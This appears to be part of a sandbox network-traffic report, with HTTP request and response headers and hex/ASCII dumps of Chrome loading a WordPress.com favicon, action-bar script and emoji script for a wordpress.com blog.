                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 64 22 29 3b 78 28 22 2e 61 63 74 6e 62 72 2d 73 74 61 74 73 20 61 22 2c 22 63 6c 69 63 6b 65 64 5f 73 74 61 74 73 22 29 3b 78 28 22 2e 66 6c 62 2d 72 65 70 6f 72 74 20 61 22 2c 22 72 65 70 6f 72 74 65 64 5f 63 6f 6e 74 65 6e 74 22 29 3b 78 28 22 2e 61 63 74 6e 62 72 2d 66 6f 6c 6c 6f 77 73 20 61 22 2c 22 6d 61 6e 61 67 65 64 5f 66 6f 6c 6c 6f 77 69 6e 67 22 29 3b 78 28 22 2e 61 63 74 6e 62 72 2d 6c 6f 67 69 6e 2d 6e 75 64 67 65 20 61 22 2c 22 63 6c 69 63 6b 65 64 5f 6c 6f 67 69 6e 5f 6e 75 64 67 65 22 29 3b 78 28 22 2e 61 63 74 6e 62 72 2d 73 69 67 6e 75 70 20 61 22 2c 22 63 6c 69 63 6b 65 64 5f 73 69 67 6e 75 70 5f 6c 69 6e 6b 22 29 3b 78 28 22 2e 61 63 74 6e 62 72 2d 6c 6f 67 69 6e 20 61 22 2c 22 63 6c 69 63 6b 65 64 5f 6c 6f 67 69 6e 5f 6c 69 6e 6b 22
                                                                                                                                                                                                                                                Data Ascii: d");x(".actnbr-stats a","clicked_stats");x(".flb-report a","reported_content");x(".actnbr-follows a","managed_following");x(".actnbr-login-nudge a","clicked_login_nudge");x(".actnbr-signup a","clicked_signup_link");x(".actnbr-login a","clicked_login_link"
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC693INData Raw: 65 2e 74 69 6d 65 53 74 61 6d 70 5d 3d 74 72 75 65 3b 6f 2e 74 61 72 67 65 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 7d 69 28 65 2c 63 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4d 28 29 7b 63 6f 6e 73 74 20 65 3d 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 61 63 74 6e 62 72 2d 66 6f 6c 6c 6f 77 2d 62 75 62 62 6c 65 20 66 6f 72 6d 22 29 3b 65 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 73 74 79 6c 65 22 29 3b 63 6f 6e 73 74 20 74 3d 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 61 63 74 6e 62 72 2d 61 63 74 6e 2d 66 6f 6c 6c 6f 77 22 29 3f 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 74 26 26 74 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 22 61 63 74 6e 62 72 2d 68 69 64 64 65 6e 22 29 3b 73 65 74 54 69 6d 65 6f 75 74 28
                                                                                                                                                                                                                                                Data Ascii: e.timeStamp]=true;o.target.dispatchEvent(e)}i(e,c)}}function M(){const e=l.querySelector(".actnbr-follow-bubble form");e.removeAttribute("style");const t=l.querySelector(".actnbr-actn-follow")?.parentNode;t&&t.classList.toggle("actnbr-hidden");setTimeout(


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                36192.168.2.1149800192.0.77.324436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC604OUTGET /i/favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                Host: s1.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC495INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:40 GMT
                                                                                                                                                                                                                                                Content-Type: image/x-icon
                                                                                                                                                                                                                                                Content-Length: 15406
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Last-Modified: Thu, 18 Apr 2024 07:27:55 GMT
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                ETag: "6620cb7b-3c2e"
                                                                                                                                                                                                                                                Expires: Fri, 18 Apr 2025 07:30:45 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 2.jfk _dfw MISS
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                X-nc: HIT jfk 2
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC874INData Raw: 00 00 01 00 03 00 10 10 00 00 01 00 20 00 68 04 00 00 36 00 00 00 20 20 00 00 01 00 20 00 28 11 00 00 9e 04 00 00 30 30 00 00 01 00 20 00 68 26 00 00 c6 15 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 00 01 ec 5b 3a 35 e9 58 39 99 e9 58 38 d9 e9 59 38 f9 e9 59 38 f9 e9 58 38 db e9 58 39 99 e7 57 3a 35 ff ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ea 55 40 0c e8 59 38 9a e9 59 38 f9 e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 38 fa e9 58 39 99 eb 4e 3b 0d 00 00 00 00 00 00 00 00 00 00 00 00 eb 62 3b 0d e9 58 39 bc e9 58 38 ff e9 58 38 ff ec 75 5b ff f3 ab 9b ff f5 b6 a8 ff f5
                                                                                                                                                                                                                                                Data Ascii: h6 (00 h&( [:5X9X8Y8Y8X8X9W:5U@Y8Y8X8X8X8X8X8X8Y8X9N;b;X9X8X8u[
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: e9 5c 3c ff f3 ab 9b ff f3 a5 94 ff eb 68 4c ff e9 5b 3b ff e9 5b 3b ff eb 68 4c ff f3 a5 94 ff f3 ad 9d ff e9 5c 3c ff e9 58 38 ff e8 58 39 99 ff ff 00 01 00 00 00 00 ea 55 40 0c e9 58 39 bc e9 58 38 ff e9 59 39 ff ed 79 60 ff f4 ad 9e ff f5 b6 a9 ff f5 b8 ab ff f4 ad 9d ff ed 76 5c ff e9 59 39 ff e9 58 38 ff e9 58 39 bc eb 62 3b 0d 00 00 00 00 00 00 00 00 00 00 00 00 eb 62 3b 0d eb 59 39 98 e9 59 38 fa e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 38 f9 e8 59 38 9a ea 55 40 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 00 01 e7 57 3a 35 e9 58 39 99 e9 58 38 db e9 58 38 f9 e9 58 38 f9 e9 58 38 d9 e9 58 39 99 ec 5b 3a 35 ff ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: \<hL[;[;hL\<X8X9U@X9X8Y9y`v\Y9X8X9b;b;Y9Y8X8X8X8X8X8X8Y8Y8U@W:5X9X8X8X8X8X9[:5
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 00 00 00 00 00 00 00 e5 5c 38 32 e8 58 38 ed e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 5f 41 ff f7 c3 b8 ff fa da d3 ff ec 76 5c ff ed 7b 62 ff fe f6 f5 ff ff ff ff ff fb e3 dd ff ea 62 43 ff e9 58 38 ff e9 58 38 ff e9 59 39 ff f1 9b 88 ff fe fc fb ff ff ff ff ff f7 ca bf ff ed 79 5f ff fa da d3 ff f7 c6 bb ff e9 5f 41 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 39 ea e8 5b 3b 38 00 00 00 00 ff 66 33 05 e8 5a 3a 9b e9 58 38 fe e9 58 38 ff e9 58 38 ff e9 5a 3a ff f2 a5 93 ff fb e0 da ff ec 74 5a ff e9 5a 3a ff f4 b0 a0 ff ff fe fe ff ff fe fd ff fd ef ed ff ef 85 6e ff e9 58 38 ff e9 58 38 ff ea 5e 3f ff f8 d1 c9 ff ff ff ff ff ff fe fe ff fc eb e7 ff eb 6d 51 ff ec 76 5c ff fa de d8 ff f2 a3 91 ff e9 5a 3a ff e9 58 38 ff e9 58 38 ff e9 58 38 fe e9 59 39 98
                                                                                                                                                                                                                                                Data Ascii: \82X8X8X8X8_Av\{bbCX8X8Y9y__AX8X8X8Y9[;8f3Z:X8X8X8Z:tZZ:nX8X8^?mQv\Z:X8X8X8Y9
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 39 ff f2 a1 8f ff fe fd fc ff fd f2 f0 ff ec 75 5a ff fc e7 e3 ff ee 84 6c ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 39 cf ea 59 38 9b e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 67 49 ff fb e5 e0 ff f4 b1 a3 ff fe f7 f6 ff ff ff ff ff fe f6 f4 ff ed 76 5c ff e9 58 38 ff e9 58 38 ff e9 59 39 ff f2 a0 8e ff fe fd fc ff ff ff ff ff fb e1 db ff ea 61 43 ff e9 58 38 ff e9 58 38 ff eb 6c 4f ff fb e3 de ff ff ff ff ff fe f7 f5 ff f3 a7 97 ff fb e5 e0 ff ea 65 47 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 9f ea 5a 39 63 ea 59 38 fa e9 58 38 ff e9 58 38 ff e9 5a 3b ff f5 b4 a6 ff fd f8 f7 ff ff fe fe ff ff ff ff ff fb e2 dc ff ec 74 59 ff e9 5b 3c ff e9 5d 3d ff ec 74 59 ff f9 d7 d0 ff ff ff ff ff ff ff ff ff f7 c3 b8 ff eb 6b 4e ff e9 59 39 ff e9 5a 3a ff f3
                                                                                                                                                                                                                                                Data Ascii: 9uZlX8X8X8Y9Y8X8X8X8gIv\X8X8Y9aCX8X8lOeGX8X8X8X8Z9cY8X8X8Z;tY[<]=tYkNY9Z:
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 fe e9 59 39 ea e9 59 38 8c e9 59 37 17 ff 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc 66 33 05 e5 57 38 32 ea 59 3a 9b ea 59 39 ea e9 59 38 fa e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 59 38 fa ea 59 39 e6 e9 59 39 98 e8 5b 3b 38 ff 66 33 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 66 33 05 ef 5a 3a 1f ea 58
                                                                                                                                                                                                                                                Data Ascii: X8X8X8X8X8X8X8X8X8X8X8Y9Y8Y7f3W82Y:Y9Y8X8X8X8X8X8X8X8X8Y8Y9Y9[;8f3f3Z:X
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 01 ea 55 40 0c e5 57 3a 4f e9 58 39 b0 ea 59 39 ee ea 59 39 fc e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 38 fd e9 59 38 ec ea 58 39 aa eb 58 38 4e eb 62 3b 0d ff 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ed 5b 37
                                                                                                                                                                                                                                                Data Ascii: U@W:OX9Y9Y9X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8Y8Y8X9X8Nb;[7
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 5d 46 0b e6 57 38 7b e9 59 38 ec e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 5a 3b ff ec 77 5d ff f8 cd c3 ff fc ee eb ff f7 c5 b9 ff ee 81 69 ff f2 9f 8e ff fd f0 ed ff ff ff ff ff fd f4 f2 ff f1 99 85 ff e9 5c 3d ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 64 47 ff f5 ba ac ff fe fb fb ff ff fe fe ff fc ec e8 ff f2 a5 94 ff f7 c5 bb ff fc ed e9 ff f8 cb c1 ff ec 77 5d ff e9 5b 3b ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 59 39 ee e7 57 39 75 d4 55 40 0c 00 00 00 00 00 00 00 00 00 00 00 00 ff 55 55 03 e3 5a 39 36 e9 58 38 d9 e9 59 38 fd e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 3a ff ec 73 59 ff f8 cb c1 ff fd f1 ee ff f6 be b2 ff
                                                                                                                                                                                                                                                Data Ascii: ]FW8{Y8X8X8X8X8X8Z;w]i\=X8X8X8X8X8dGw][;X8X8X8X8X8Y9W9uU@UUZ96X8Y8X8X8X8X8Y:sY
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 38 ff e9 58 38 ff e9 5b 3c ff f1 9c 89 ff fc ed e9 ff f4 b4 a6 ff ea 62 43 ff e9 58 38 ff e9 59 39 ff eb 6e 52 ff f9 d8 d1 ff ff fe fe ff ff ff ff ff ff fd fd ff f9 d2 ca ff eb 6c 4f ff ea 5f 40 ff f3 a5 94 ff f7 c5 ba ff ec 6d 51 ff e9 5a 3b ff f0 8d 78 ff fc eb e8 ff ff ff ff ff ff ff ff ff fe f7 f5 ff f3 a6 95 ff ea 61 42 ff ed 7b 62 ff fc e6 e1 ff f4 ac 9b ff ea 5f 40 ff e9 58 38 ff ea 60 42 ff f4 b3 a4 ff fb ed e9 ff f2 9d 8a ff e9 5c 3c ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 f0 ec 5a 39 5e e9 59 39 98 e9 58 38 f6 e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 63 45 ff f5 b9 ab ff fc ed ea ff ef 85 6f ff e9 5b 3c ff e9 58 38 ff e9 5b 3b ff f0 8e 79 ff fc eb e8 ff ff ff ff ff ff ff ff ff fe f7 f6 ff f3 a8 98 ff ea 5f 40 ff e9
                                                                                                                                                                                                                                                Data Ascii: 8X8[<bCX8Y9nRlO_@mQZ;xaB{b_@X8`B\<X8X8X8X8X8Z9^Y9X8X8X8X8X8cEo[<X8[;y_@
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: ff f3 a5 94 ff fe f7 f5 ff ff ff ff ff ff ff ff ff fe f6 f4 ff f3 a5 94 ff e9 5d 3e ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 39 ff eb 6c 50 ff f8 cd c3 ff ff fc fc ff ff ff ff ff ff ff ff ff fb e4 df ff ee 81 69 ff e9 5a 3a ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 60 41 ff f5 b3 a5 ff ff fb fb ff fa dd d7 ff ed 76 5c ff ea 60 42 ff f4 ae 9f ff fc e6 e2 ff ee 7e 65 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 fe e9 59 39 f2 e9 59 39 dc e9 58 39 fc e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ed 79 5f ff fa df d9 ff f7 c3 b6 ff ea 63 45 ff ea 68 4b ff f8 d0 c8 ff ff fd fd ff ff ff ff ff ff ff ff ff fc e7 e3 ff ef 85 6f ff e9 5a 3a ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 5a 3a ff ef 88 71 ff fb e8 e4 ff ff ff ff ff ff ff ff ff ff fe
                                                                                                                                                                                                                                                Data Ascii: ]>X8X8X8Y9lPiZ:X8X8X8`Av\`B~eX8X8X8X8X8Y9Y9X9X8X8X8X8y_cEhKoZ:X8X8X8Z:q
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: ea 61 43 ff eb 6b 4f ff f4 ac 9c ff f5 b7 aa ff f4 b3 a4 ff f4 aa 9b ff f4 a9 9a ff f4 aa 9a ff f4 ad 9e ff f4 b4 a6 ff f5 b4 a5 ff ee 81 6a ff e9 5a 3a ff e9 5a 3b ff f1 95 82 ff fd f0 ed ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe fd fc ff fa df d9 ff ed 7a 60 ff e9 5a 3a ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 59 38 f4 e9 5a 39 7d e3 55 39 09 ff 80 00 02 ed 5b 37 38 e9 58 38 d0 ea 58 38 fe e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 5e 3f ff f2 a1 8f ff fc eb e7 ff f7 c6 ba ff ec 74 5a ff ea 60 42 ff ea 60 42 ff ea 61 43 ff e9 5f 40 ff e9 59 39 ff e9 5a 3b ff ea 61 42 ff ea 61 43 ff ea 60 42 ff ea 5f 40 ff ea 5f 40 ff ea 5f 40 ff ea 5f 41 ff ea 61 43 ff ea 61 43 ff e9 5c 3d ff e9 58 38 ff e9 5a 3a ff f0 8d 77 ff fc e9 e6
                                                                                                                                                                                                                                                Data Ascii: aCkOjZ:Z;z`Z:X8X8X8X8Y8Z9}U9[78X8X8X8X8X8X8^?tZ`B`BaC_@Y9Z;aBaC`B_@_@_@_AaCaC\=X8Z:w


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                37192.168.2.1149801192.0.77.324436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC405OUTGET /wp-includes/js/wp-emoji-release.min.js?m=1719498190i&ver=6.8-alpha-59438 HTTP/1.1
                                                                                                                                                                                                                                                Host: s2.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC505INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:40 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                Content-Length: 18726
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Last-Modified: Thu, 27 Jun 2024 14:23:19 GMT
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                ETag: "667d75d7-4926"
                                                                                                                                                                                                                                                Expires: Fri, 21 Nov 2025 15:40:22 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 2.jfk _dca MISS
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                X-nc: HIT jfk 1
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC864INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2f 20 53 6f 75 72 63 65 3a 20 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 74 77 65 6d 6f 6a 69 2e 6d 69 6e 2e 6a 73 0a 76 61 72 20 74 77 65 6d 6f 6a 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3d 7b 62 61 73 65 3a 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 67 68 2f 6a 64 65 63 6b 65 64 2f 74 77 65 6d 6f 6a 69 40 31 35 2e 30 2e 33 2f 61 73 73 65 74 73 2f 22 2c 65 78 74 3a 22 2e 70 6e 67 22 2c 73 69 7a 65 3a 22 37 32 78 37 32 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 65 6d 6f 6a 69 22 2c 63 6f 6e 76 65 72 74 3a 7b 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 3a 66 75 6e 63 74
                                                                                                                                                                                                                                                Data Ascii: /*! This file is auto-generated */// Source: wp-includes/js/twemoji.min.jsvar twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:funct
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 26 28 63 3d 63 2e 63 6f 6e 63 61 74 28 22 20 22 2c 66 2c 27 3d 22 27 2c 75 5b 66 5d 2e 72 65 70 6c 61 63 65 28 74 2c 72 29 2c 27 22 27 29 29 3b 63 3d 63 2e 63 6f 6e 63 61 74 28 22 2f 3e 22 29 7d 72 65 74 75 72 6e 20 63 7d 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 64 2c 75 29 7b 76 61 72 20 66 2c 63 2c 65 2c 62 2c 61 2c 74 2c 72 2c 6e 2c 6f 2c 73 2c 69 2c 6c 3d 66 75 6e 63 74 69 6f 6e 20 64 28 75 2c 66 29 7b 76 61 72 20 63 2c 65 2c 62 3d 75 2e 63 68 69 6c 64 4e 6f 64 65 73 2c 61 3d 62 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 3b 61 2d 2d 3b 29 63 3d 62 5b 61 5d 2c 33 3d 3d 3d 28 65 3d 63 2e 6e 6f 64 65 54 79 70 65 29 3f 66 2e 70 75 73 68 28 63 29 3a 31 21 3d 3d 65 7c 7c 22 6f 77 6e 65 72 53 56 47 45 6c 65 6d 65 6e 74 22 69 6e 20 63 7c 7c 6d 2e 74 65 73 74 28 63 2e 6e
                                                                                                                                                                                                                                                Data Ascii: &(c=c.concat(" ",f,'="',u[f].replace(t,r),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,r,n,o,s,i,l=function d(u,f){var c,e,b=u.childNodes,a=b.length;for(;a--;)c=b[a],3===(e=c.nodeType)?f.push(c):1!==e||"ownerSVGElement"in c||m.test(c.n
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5c 75 64 66 66 63 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5c 75 64 66 66 64 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c
                                                                                                                                                                                                                                                Data Ascii: \u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc68\ud83c\udffc\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc68\ud83c\udffd\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc68\
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5b 5c 75 64 66 66 63 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5c 75 64 66 66 63 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64
                                                                                                                                                                                                                                                Data Ascii: udfff]|\ud83d\udc69\ud83c\udfff\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc69\ud83c[\udffb-\udfff]|\ud83e\uddd1\ud83c\udffb\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83e\uddd1\ud83c[\udffc-\udfff]|\ud83e\uddd1\ud83c\udffc\u200d\u2764\ufe0f\u200d
